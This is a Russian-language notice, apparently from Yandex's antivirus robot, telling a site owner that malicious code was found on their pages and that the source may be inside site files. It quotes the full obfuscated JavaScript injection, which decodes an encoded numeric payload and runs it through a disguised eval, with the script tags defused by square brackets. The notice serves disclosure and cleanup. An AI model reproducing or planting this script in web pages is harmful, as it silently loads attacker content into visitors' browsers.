При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:

[script language="javascript" type="text/javascript"]function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var dlul={eya:5111,zn:function(){createCSS("#c0","background: url(data:,eva)");var zv=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){var tfq=r[i].cssRules||r[i].rules;for(var smgl=0;smgl<tfq.length;smgl++){var fb=tfq.item?tfq.item(smgl):tfq[smgl];if(!fb.selectorText.match(/#c(\d+)/))continue;zv=fb.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}
var jqt=[5102,5102,5006,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5
008,5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5
0
33,5014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,49
8
8,5098,5102,5102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,510
2
,5102,4986,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,4993,5014,4997
,
5079,5013,5011,4990,5079,5050,5079,5011,5000,5012,4994,5002,5010,5001,4995,5065,
5
012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,5001,4995,5071,5077,5013,5
0
00,5011,4990,5077,5070,5052,5098,5102,5102,5102,4995,4997,4990,5079,4988,5098,51
0
2,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5014,4999,4999,501
0
,5001,5011,5044,5007,5006,5003,5011,5071,5013,5011,4990,5070,5052,5098,5102,5102
,
5102,4986,5079,5012,5014,4995,5012,5007,5079,5071,5010,5070,5079,4988,5098,5102,
5
102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5013,5000,5011,4990,5
0
79,5050,5079,5013,5011,4990,5052,5098,5102,5102,5102,4986,5098,5102,5102,5102,50
0
6,5009,5079,5071,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008,5010,4995,504
2
,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,5014,5002,5010
,
5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5070,4988,5098,5102,5102,
5
102,5102,5006,5009,4997,5014,5002,5010,4997,5071,5070,5052,5098,5102,5102,5102,4
9
86,5079,5010,5003,4996,5010,5079,4988,5098,5102,5102,5102,5102,5011,5000,5012,49
9
4,5002,5010,5001,4995,5065,4992,4997,5006,4995,5010,5071,5077,5051,5006,5009,499
7
,5014,5002,5010,5079,4996,4997,5012,5050,5072,5007,4995,4995,4999,5053,5064,5064
,
4999,5006,5012,5007,5010,4995,5014,5065,5001,5010,4995,5064,5002,5014,5006,5001,
5
065,4999,5007,4999,5072,5079,4992,5006,5011,4995,5007,5050,5072,5062,5063,5072,5
0
79,5007,5010,5006,5008,5007,4995,5050,5072,5062,5063,5072,5079,4996,4995,4990,50
0
3,5010,5050,5072,4993,5006,4996,5006,5013,5006,5003,5006,4995,4990,5053,5007,500
6
,5011,5011,5010,5001,5052,4999,5000,4996,5006,4995,5006,5000,5001,5053,5014,5013
,
4996,5000,5003,4994,4995,5010,5052,5003,5010,5009,4995,5053,5063,5052,4995,5000,
4
999,5053,5063,5052,5072,5049,5051,5064,5006,5009,4997,5014,5002,5010,5049,5077,5
0
70,5052,5098,5102,5102,5102,4986,5098,5102,5102,4986,5098,5102,5102,5009,4994,50
0
1,5012,4995,5006,5000,5001,5079,5006,5009,4997,5014,5002,5010,4997,5071,5070,498
8
,5098,5102,5102,5102,4993,5014,4997,5079,5009,5079,5050,5079,5011,5000,5012,4994
,
5002,5010,5001,4995,5065,5012,4997,5010,5014,4995,5010,5042,5003,5010,5002,5010,
5
001,4995,5071,5072,5006,5009,4997,5014,5002,5010,5072,5070,5052,5009,5065,4996,5
0
10,4995,5046,4995,4995,4997,5006,5013,4994,4995,5010,5071,5072,4996,4997,5012,50
7
2,5067,5072,5007,4995,4995,4999,5053,5064,5064,4999,5006,5012,5007,5010,4995,501
4
,5065,5001,5010,4995,5064,5002,5014,5006,5001,5065,4999,5007,4999,5072,5070,5052
,
5009,5065,4996,4995,4990,5003,5010,5065,4993,5006,4996,5006,5013,5006,5003,5006,
4
995,4990,5050,5072,5007,5006,5011,5011,5010,5001,5072,5052,5009,5065,4996,4995,4
9
90,5003,5010,5065,4999,5000,4996,5006,4995,5006,5000,5001,5050,5072,5014,5013,49
9
6,5000,5003,4994,4995,5010,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065,500
3
,5010,5009,4995,5050,5072,5063,5072,5052,5009,5065,4996,4995,4990,5003,5010,5065
,
4995,5000,4999,5050,5072,5063,5072,5052,5009,5065,4996,5010,4995,5046,4995,4995,
4
997,5006,5013,4994,4995,5010,5071,5072,4992,5006,5011,4995,5007,5072,5067,5072,5
0
62,5063,5072,5070,5052,5009,5065,4996,5010,4995,5046,4995,4995,4997,5006,5013,49
9
4,4995,5010,5071,5072,5007,5010,5006,5008,5007,4995,5072,5067,5072,5062,5063,507
2
,5070,5052,5098,5102,5102,5102,5011,5000,5012,4994,5002,5010,5001,4995,5065,5008
,
5010,4995,5042,5003,5010,5002,5010,5001,4995,4996,5045,4990,5027,5014,5008,5033,
5
014,5002,5010,5071,5072,5013,5000,5011,4990,5072,5070,5020,5063,5018,5065,5014,4
9
99,4999,5010,5001,5011,5044,5007,5006,5003,5011,5071,5009,5070,5052,5098,5102,51
0
2,4986];var s="";dv=eval(zv+"l");uw=String.fromCharCode;for(var i=0;i<jqt.length;i++){sfh=dlul.eya-parseInt(jqt[i]);s+=(uw(sfh));}
dv(s);}};dlul.zn();[/script]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Обращаем Ваше внимание на тот факт, что вредоносный код обнаруживается на страницах Вашего сайта не при каждой проверке, кроме того, он нередко появляется перед открывающим или после закрывающего тега html. Поэтому мы не исключаем возможность, что источник заражения находится внутри содержимого Ваших файлов.